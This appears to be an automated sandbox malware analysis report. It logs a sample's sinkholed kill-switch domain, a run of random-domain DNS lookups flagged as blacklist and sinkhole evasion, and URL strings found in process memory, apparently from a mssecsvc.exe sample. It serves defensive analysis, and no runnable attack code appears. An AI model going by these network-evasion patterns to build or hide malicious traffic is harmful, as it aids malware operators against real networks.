6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
              Tries to resolve many domain names, but no domain seems valid
              Source: unknownDNS traffic detected: query: lanclm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: atvhio.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: toxthr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qmehuz.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uplveo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fosajt.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: tpmtiw.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: tvmwem.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: kuwazq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: lcogil.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: otidym.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qmimjr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: xeefyh.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: chlntf.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fudevu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: aaeyfv.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: egrbjv.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wcxezu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: mvnywi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qtnarp.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: jwbsjo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: liamse.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: boqbzc.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: paelui.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: rjirxk.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: akeofy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pangeq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: abeaay.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qoumtu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: jiarfr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dnirke.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wlnmvm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: xyzrpb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: seyuei.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uagfvy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: vwfgtb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cixudc.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: rchrgb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: tgvyjo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: oezaau.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: phirwq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wufhfo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: rffriz.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dzbyvr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iremdw.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: clpivo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: djtidt.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: trptke.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dvnexx.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: hmpjac.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ysvfez.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: youdqa.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uxcrve.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qgbuwt.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: enqgsr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bnwzie.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: mbxpjh.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: otoagh.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: kfgoeu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ureefd.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: zyjedf.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: glutbe.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: xgxizm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: exevye.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uyjpue.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wnzgoe.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ihepfj.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iireby.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: eymtmi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: smezbn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: btkcso.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: poydst.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: eeauou.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: veqbbn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: olieyo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ktceha.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pxunuy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ahanjw.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qavmrl.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: vgemhe.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uaqjzn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cerbyj.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wfuinm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pnuoyg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fuejrn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bauied.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dpoead.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: exiuuy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: niongj.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: joddge.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cudiqm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iooaeg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uatacq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: aoulrr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: quydys.com replaycode: Name error (3)
              Queries random domain names (often used to prevent blacklisting and sinkholes)
              Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
              Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
              Source: svchost.exe, 00000021.00000000.356224558.00000219BE6C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788969957.00000219BE6C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com equals www.facebook.com (Facebook)
              Source: svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: svchost.exe, 0000000F.00000000.294511451.000001BC27D13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.796337962.000001BC27D13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282592665.000001BC27D13000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cdn.content.prod.cms.msn.com/singletile/summary/alias/experiencebyname/today?market=en-US&sou
              Source: lsass.exe, 0000000B.00000000.281178708.0000025D33A00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.789755252.0000025D33A00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272446566.0000025D33A00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.790193302.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281207847.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272509721.0000025D33A20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: lsass.exe, 0000000B.00000002.790425862.0000025D33A2B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272531503.0000025D33A2B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281220784.0000025D33A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: lsass.exe, 0000000B.00000000.272068694.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.786738736.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: svchost.exe, 00000027.00000000.398010629.000002631E56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.790193302.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281207847.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272509721.0000025D33A20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272068694.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272020741.0000025D33267000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.790193302.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281207847.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272509721.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280961439.0000025D33267000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
              Source: svchost.exe, 00000021.00000000.356224558.00000219BE6C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788969957.00000219BE6C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
              Source: mssecsvc.exe.2.drString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Source: mssecsvc.exe, 00000008.00000002.351098719.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000008.00000002.351240115.0000000000D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
              Source: mssecsvc.exe, 00000004.00000002.498964463.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 0000000F.00000000.293803098.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.794537669.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282252800.000001BC27C69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://candycrush.king.com/mobile/windows/TileTemplate.xml
              Source: svchost.exe, 0000000F.00000000.282350573.000001BC27CB1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.793472682.000001BC27C0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.795300147.000001BC27CB1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282060280.000001BC27C0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.293382810.000001BC27C0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-US
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000015.00000003.321758168.0000018D75241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322285690.0000018D75242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000027.00000002.805268314.000002631E79E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.400313663.000002631E79E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://site-cdn.onenote.net/161182431559_Images/LiveTileImages/MediumAndLarge/Image1.png
